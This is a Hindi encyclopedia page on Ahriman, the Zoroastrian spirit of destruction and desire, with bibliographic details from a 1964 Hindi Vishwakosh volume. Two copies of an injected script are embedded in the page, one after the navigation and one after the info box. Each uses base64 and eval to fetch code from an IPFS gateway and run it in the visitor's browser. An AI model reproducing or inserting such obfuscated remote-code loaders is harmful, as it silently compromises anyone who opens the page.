अह्रिमन

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
अह्रिमन
पुस्तक नाम हिन्दी विश्वकोश खण्ड 1
पृष्ठ संख्या 321
भाषा हिन्दी देवनागरी
संपादक सुधाकर पाण्डेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1964 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक सर रुस्तम पेस्तनजी मसानी

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अह्रिमन ज़रथुस्त्र धर्म में आगे चलकर वासना की प्रतीक अह्रिमन संज्ञा हुई। गाथा साहित्य के अवेस्ता ग्रंथ में इस संज्ञा का मौलिक रूप 'अंग्र मैन्यु' (वैदिक मन्यु) एवं पहलवी में 'अह्रिमन' है। जब से धर्म के संसार में इस महाभयंकर राक्षस का आगमन हुआ, विनाश और प्रलय की सृष्टि हुई। इसमें तथा 'स्पेंत मैन्यु' में, जो कल्याणकारी शक्ति है, संघर्ष का बीज भी बो दिया गया। पैगंबर का अपने अनुयायियों के लिए अनुशासन इसी वासना की शक्ति से अनवरत लड़ते रहना है जिसका अंतिम परिणाम कल्याणकारी शक्ति की जीत एवं अह्रिमन का पलायन एवं पाताल लोक में शरण लेना है।